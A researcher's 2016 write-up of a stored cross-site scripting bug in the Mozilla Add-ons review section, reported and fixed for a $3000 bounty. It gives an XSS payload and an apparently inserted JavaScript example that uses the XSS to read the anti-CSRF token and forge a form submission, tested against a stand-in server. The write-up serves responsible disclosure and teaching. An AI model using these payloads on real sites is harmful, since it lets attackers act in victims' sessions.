Monday, 22 February 2016

Cross-Site Scripting (XSS) in the Mozilla Add-ons site

I am Paresh Parmar.
This is my first write-up.

So let's start.
It was 2016-02-09 and I was reading a blog post by Ashar Javed.

After reading that blog, I set my target to Mozilla Add-ons.
It was mobile and XSS days for me ;)
so I was hunting only mobile sites.
I was using this user-agent string:
Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0

So let's go.
After setting up the target, I chose the review section endpoint for hunting.

For example:
Here you can write a review about a particular add-on!

So I gave 5 stars to that add-on :p and in the review I wrote

<img src=x onerror=alert(document.domain)>
I submitted the review and boom!!! The XSS executed.

Within two minutes I had found this simple XSS.
I reported this issue to
After reporting this issue, I started digging into it.

As far as I know, we can bypass the CSRF protection of that page via XSS: the injected script runs in the site's own origin, so it can read the anti-CSRF token the server embeds in the form for the victim's session and replay it.
There are three steps to bypass the CSRF token using XSS:

1. First, request the form
2. Extract the valid CSRF token
3. Submit the form using the valid CSRF token
Here's a good example using XMLHttpRequest:
Reference:
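Here is an added example (not code from the original post, and not the Mozilla Add-ons site's own code) of the three steps as an XMLHttpRequest payload that the stored XSS would run in the victim's browser, together with a constructed stand-in for the server so the flow runs offline. The review endpoint path, the form field names, and the Django-style token field name `csrfmiddlewaretoken` are assumptions; the stand-in server hands out a session-bound token on GET and rejects any POST that does not echo it, which is exactly the check the XSS defeats.

```javascript
// Added example, not code from the original post: the three-step CSRF bypass
// driven from an XSS foothold (request the form, extract the token, submit with it).
// The endpoint path and the token field name ("csrfmiddlewaretoken", Django's
// default) are assumptions, not taken from the Mozilla Add-ons site.
const REVIEW_FORM_URL = "/firefox/addon/example-addon/reviews/add"; // hypothetical

// Step 2: find the hidden token input in the fetched form, whatever the attribute order.
function extractCsrfToken(html, fieldName = "csrfmiddlewaretoken") {
  const inputs = html.match(/<input\b[^>]*>/gi) || [];
  for (const tag of inputs) {
    const name = tag.match(/\bname=["']([^"']*)["']/i);
    if (!name || name[1] !== fieldName) continue;
    const value = tag.match(/\bvalue=["']([^"']*)["']/i);
    return value ? value[1] : null;
  }
  return null;
}

// application/x-www-form-urlencoded body, as a normal form submit would send it.
function encodeForm(fields) {
  return Object.entries(fields)
    .map(([k, v]) => encodeURIComponent(k) + "=" + encodeURIComponent(v))
    .join("&");
}

// Promise wrapper over an XMLHttpRequest-style constructor so the steps read in order.
// A same-origin XHR carries the victim's session cookies automatically.
function request(XhrCtor, method, url, body, contentType) {
  return new Promise((resolve, reject) => {
    const xhr = new XhrCtor();
    xhr.open(method, url, true);
    if (contentType) xhr.setRequestHeader("Content-Type", contentType);
    xhr.onload = () => resolve({ status: xhr.status, body: xhr.responseText });
    xhr.onerror = () => reject(new Error("request failed: " + method + " " + url));
    xhr.send(body === undefined ? null : body);
  });
}

// The payload an attacker would run in the victim's browser via the stored XSS.
async function csrfBypass(XhrCtor, formUrl, fields, fieldName = "csrfmiddlewaretoken") {
  const page = await request(XhrCtor, "GET", formUrl);          // 1. request the form
  const token = extractCsrfToken(page.body, fieldName);         // 2. extract the token
  if (!token) throw new Error("no CSRF token found in form");
  const body = encodeForm({ [fieldName]: token, ...fields });   // 3. submit with it
  return request(XhrCtor, "POST", formUrl, body, "application/x-www-form-urlencoded");
}

// Forged request without the token: what a plain cross-site CSRF attempt looks like.
function postWithoutToken(XhrCtor, formUrl, fields) {
  return request(XhrCtor, "POST", formUrl, encodeForm(fields), "application/x-www-form-urlencoded");
}

// --- Constructed stand-in for XMLHttpRequest so the flow runs offline (not a real server).
// GET returns a form carrying a session-bound token; POST is accepted only if it echoes it.
const SESSION_TOKEN = "c0nstructed-session-bound-token";
const FORM_HTML =
  '<form method="post">' +
  '<input type="hidden" value="' + SESSION_TOKEN + '" name="csrfmiddlewaretoken">' +
  '<textarea name="body"></textarea><input type="submit" value="Post review"></form>';

class FakeXHR {
  open(method, url) { this.method = method; this.url = url; this.headers = {}; }
  setRequestHeader(k, v) { this.headers[k] = v; }
  send(body) {
    if (this.method === "GET") {
      this.status = 200;
      this.responseText = FORM_HTML;
    } else {
      const params = new URLSearchParams(body || "");
      const ok = params.get("csrfmiddlewaretoken") === SESSION_TOKEN;
      this.status = ok ? 200 : 403;
      this.responseText = ok ? "review posted: " + params.get("body") : "CSRF verification failed";
    }
    if (this.onload) this.onload();
  }
}

if (typeof require !== "undefined" && require.main === module) {
  const fields = { body: "great add-on", rating: "5" };
  postWithoutToken(FakeXHR, REVIEW_FORM_URL, fields)
    .then(r => console.log("without token:", r.status, r.body));
  csrfBypass(FakeXHR, REVIEW_FORM_URL, fields)
    .then(r => console.log("with token:   ", r.status, r.body));
}
```

In a real browser you would pass `XMLHttpRequest` instead of `FakeXHR`; the point of the stand-in is to show side by side that the token check stops a plain forged POST (403) but not one issued by script running in the site's own origin (200), because that script can read the form first.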

After only 12 hours they confirmed this issue, and in just 2 days they fixed it.
Here's the commit:

Regarding the bounty, I sent an email to along with the Bugzilla report ID and another PoC ;)
After a few days, I got this mail:

Here's the video PoC:

2016-02-09 13:35:54 PST - Report Sent

2016-02-10 07:10:17 PST - Confirmed

2016-02-11 08:53:31 PST - Fixed

2016-02-20 - Bounty Awarded: $3000

Special thanks to the Mozilla Bug Bounty/Bugzilla team.